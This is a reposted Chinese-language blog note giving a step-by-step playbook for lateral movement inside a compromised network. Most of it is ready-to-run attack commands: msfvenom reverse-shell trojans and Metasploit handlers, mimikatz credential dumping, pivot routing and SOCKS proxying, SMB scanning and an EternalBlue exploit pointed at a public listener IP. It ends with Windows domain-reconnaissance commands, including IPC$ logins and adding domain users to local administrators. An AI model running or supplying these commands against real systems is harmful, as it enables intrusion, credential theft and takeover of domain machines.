內網橫向思路


內網橫向思路

​ 當已經拿到一台機器的shell之后,需要進行內網繼續滲透過程。通過自己的實踐,得出以下滲透思路。

服務器信息收集

​ 當前shell機器信息收集,獲取敏感信息。詳細可以看DC1靶場思路,主要是文件敏感信息獲取及操作系統有關知識

補充:

  1. 利用 cs上線受害機

    詳細看cs使用教程

    https://www.freebuf.com/sectool/125237.html

    https://www.cnblogs.com/nongchaoer/p/12055305.html

  2. 利用mimikatz獲取管理員用戶密碼

    注意首先需要提權

  3. 或者新建賬戶

內網信息收集和目標定位
  1. 生成后門木馬,獲取會話

    生成木馬:
    
    Linux
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf
    Windows
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
    
    監聽模塊:
    use exploit/multi/handler
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    set LHOST <IP>
    set LPORT 1122
    set ExitOnSession false  //
    exploit -j -z	//將會話在后台掛起
    
    退出命令行,將會話掛到后台
    background
    重新進入會話
    sessions 1
    
  2. 通過會話進入命令行,查看受害機信息

    ipconfig
    獲取受害機網卡和ip信息。可以推測內網ip段
    
    arp -a
    查看arp緩存,得到內網路由,進一步的到內網信息
    
  3. 可以使用讓受害機訪問外網,本機代理抓包爆破的方式,確定其真實IP

  4. msf增加路由:route add 192.168.0.0 255.255.255.0 2,然后查看路由 route print

    (如果linux里面有多塊網卡時,給會話增加一條默認內網路由讓其在內網通信)


msf內網路由、代理設置

​ 在進行內網橫向滲透之前有一步非常重要,就是在收集內網信息之后給會話設置內網路由,然后設置代理。

  1. 設置會話路由(給建立的會話指定路由到內網,與內網進行通信)

    在msf中給會話設置路由
    route add 192.168.52.0 255.255.255.0 1
                 內網ip段		子網掩碼   會話id
    查看路由
    route print
    
  2. 設置本地代理(建立一個socket隧道,使得msf(程序)的流量通過socket代理能夠通過路由進入內網通信)

    在msf中配置代理
    1.打開/etc/proxychains.conf將端口設置為 1080
    vi /etc/proxychains.conf 
    
    [proxylist]
    socks4		127.0.0.1 1080
    
    2.
    use auxiliary/sever/socks4a
    set srvhost 127.0.0.1
    run
    
內網資產掃描
  1. 使用輔助端口掃描模塊掃描,查看所需設置的值.(內網段內主機在線情況及端口開放情況)
use auxiliary/scanner/portscan/tcp
set RHOSTs 192.168.52.0/24
set PORTS 445 3389 6379 80 8080 22 
exploit
內網SMB信息掃描

查看139和445端口的開放情況

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.0.201-203
exploit
永恆之藍攻擊
  1. 查看開放了445端口的機器是否存在永恆之藍漏洞

    auxiliary/scanner/smb/smb_ms17_010
    set payload windows/x64/meterpreter/reverse_tcp
    set rhosts 192.168.0.201-203
    run
    
  2. 使用永恆之藍進行攻擊

    use exploit/windows/smb/ms17_010_psexec
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 47.92.248.200
    set rhost 192.168.0.202
    set lport 32323
    

主要進行域滲透拿到域控的那台主機的權限

拿下一台內網機器,首先要定位內網機器的架構。

收集基本信息:

ipconfig /all        ------ 查詢本機IP段,所在域等 
net user           ------ 本機用戶列表 
net localgroup administrators      ------ 本機管理員[通常含有域用戶] 
net user /domain             ------ 查詢域用戶 
net ``group` `/domain            ------ 查詢域里面的工作組
net ``group` `"domain admins"` `/domain    ------ 查詢域管理員用戶組 
net localgroup administrators /domain  ------ 登錄本機的域管理員
net localgroup administrators workgroup\user001 /add  ------域用戶添加到本機
net ``group` `"domain controllers"` `/domain    ------ 查看域控制器(如果有多台) 
net time /domain          ------ 判斷主域,主域服務器都做時間服務器 
net config workstation       ------ 當前登錄域 
net session            ------ 查看當前會話 
net use \\ip\ipc$ pawword /user:username   ------ 建立IPC會話[空連接-***] 
net share             ------ 查看SMB指向的路徑[即共享]
net view              ------ 查詢同一域內機器列表 
net view \\ip           ------ 查詢某IP共享
net view /domain          ------ 查詢域列表
net view /domain:domainname    ------ 查看workgroup域中計算機列表 
net start             ------ 查看當前運行的服務 
net accounts            ------ 查看本地密碼策略 
net accounts /domain        ------ 查看域密碼策略 
nbtstat –A ip           ------netbios 查詢 
netstat –an/ano/anb        ------ 網絡連接查詢 
route print            ------ 路由表tasklist /V            ----- 查看進程[顯示對應用戶]
tasklist /S ip /U domain\username /P /V       ----- 查看遠程計算機進程列表
qprocess *             ----- 類似tasklist
qprocess /SERVER:IP        ----- 遠程查看計算機進程列表
nslookup –qt-MX Yahoo.com     ----- 查看郵件服務器
whoami /all            ----- 查詢當前用戶權限等
set`                `----- 查看系統環境變量
systeminfo             ----- 查看系統信息
qwinsta              ----- 查看登錄情況
qwinsta /SERVER:IP         ----- 查看遠程登錄情況
fsutil fsinfo drives        ----- 查看所有盤符
gpupdate /force          ----- 更新域策略cmdkey /l              ----- 看是否保存了登陸憑證。(攻擊者會先查看管理員是否保留了登陸憑證,方便后續的憑證抓取。) echo  %logonserver%         ----- 查看登陸域

域滲透文章 https://www.cnblogs.com/bmjoker/p/10336247.html

注意hash傳遞攻擊

具體詳細步驟請看內網穿透這篇文章


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM